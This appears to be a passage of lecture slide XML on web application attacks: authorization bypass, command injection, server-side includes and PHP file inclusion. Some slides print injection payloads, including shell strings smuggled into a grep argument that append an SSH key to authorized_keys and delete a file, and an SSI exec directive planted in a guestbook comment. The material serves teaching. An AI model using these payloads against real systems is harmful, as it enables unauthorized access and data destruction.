        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25434462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Learned</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Resources are identified by paths</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web pages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Filenames</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Resources are identified by parameters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If the resources identifiers are predictable or can be tampered with, it is possible to bypass authorization checks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The flow of an application is not enforced by the links provided to the user</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31679206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normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Server (Mis)Configuration: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Unexpected Interactions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="661507" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>File servers and web servers might be running on the same host</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If data can be uploaded a file transfer protocol (e.g., FTP) and then requested using the web server it might be possible to execute code using server-side execution mechanisms (e.g., Node.js files) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If the web site allows one to upload files (e.g., images) it might be possible to upload content that is then requested as a code component (e.g., a PHP file)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29464650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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Command Injection Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="675843" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Main problem: Incorrect (or complete lack of) validation of user input that results in the execution of commands on the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use of (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>unsanitized</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) external input to compose strings that are passed to function that can evaluate code or include code from a file (language-specific)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>system()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>popen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>include()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>require()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="358889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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>HTTP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="818179" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Client </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Opens a TCP connection </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Sends a request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Server </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Accepts the connection </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Processes the request </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Sends a reply</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Multiple requests can be sent using the same TCP connection</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2935465336"/>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dirty="0"/>
              <a:t>Command Injection Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="931843" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: CGI program executes a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> command over a server file using the user input as parameter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Implementation 1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>system(“grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> $exp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>phonebook.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>”);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>By providing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>foo; echo ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>1024 35 1386...’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> &gt; ~/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>authorized_keys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>rm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>one can obtain interactive access and delete the text file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Implementation 2: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>system(“grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> \”$exp\” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>phonebook.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>”);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>By providing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>\”foo; echo ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>1024 35 1386...’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> &gt; ~/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>authorized_keys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>rm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> \”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> one can steal the password file and delete the text file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Implementation 3: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>system(“grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>”, “-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>”, $exp, “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>phonebook.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>”);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In this case the execution is similar to an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() and therefore more secure (no shell parsing involved)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16001570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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server-Side Includes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="664579" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server side includes (SSIs) allow one to introduce directives into web pages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SSIs are introduced as</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;!-- #element attribute=value attribute=value … --&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Examples are:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Config</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Echo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Include</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exec (!)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If a user is able to determine the contents of a web page it is possible to execute arbitrary commands</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="258905782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a:t>GuestBook CGI Script</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="684035" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Script that allows one to set up a guest book for a web site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allows one to insert comment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User inserts comment text containing</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>&lt;!-- #exec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>=“echo ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>1024 35 1386...’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> &gt; ~/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>authorized_keys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>” --&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User requests to see the guestbook</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The page is served by the web server and, as a consequence, the SSI directive is executed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="384156432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Inclusion Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Many web frameworks and languages allow developers to modularize their code by providing a module inclusion mechanism (similar to the #include directive in C)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If not configured correctly, this can be used to inject attack code into the application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Upload code that is then included</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Provide a remote code component (if the language supports remote inclusion)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Influence the path used to locate the code component</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="328877639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Injection in PHP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>allow_url_fopen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> directive allows URLs to be used when including files with include() and require()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If user input is used to create the name of the file to be opened, then a remote attacker can execute arbitrary code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>mainapp.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>includePath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>=‘/includes/’; // this </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> will be visible in the included file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>include($includePath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> . ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>library.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>’);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>library.php</a:t>
            </a:r>
